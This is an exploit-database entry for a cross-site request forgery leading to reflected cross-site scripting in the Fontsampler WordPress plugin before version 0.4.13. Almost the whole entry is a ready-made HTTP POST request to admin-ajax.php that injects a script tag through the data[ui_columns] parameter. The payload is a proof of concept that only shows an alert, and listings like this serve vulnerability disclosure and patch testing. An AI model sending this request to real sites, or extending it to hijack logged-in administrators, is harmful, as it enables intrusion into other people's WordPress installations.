Exploit for Fontsampler < 0.4.13 - CSRF to Authenticated Reflected Cross-Site Scripting (XSS)

Name: Exploit for Fontsampler < 0.4.13 - CSRF to Authenticated Reflected Cross-Site Scripting (XSS)
Rating: 5 (79 reviews)

2021-06-30 | CVSS 0.2

## https://sploitus.com/exploit?id=WPEX-ID:C1E4AAFF-E68D-4BB3-9F82-31C3A649B41B
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 80
Connection: close
Cookie: [CSRF via any authenticated user]

action=get_mock_fontsampler&data[ui_columns]=TEST"><script>alert(/XSS/)</script>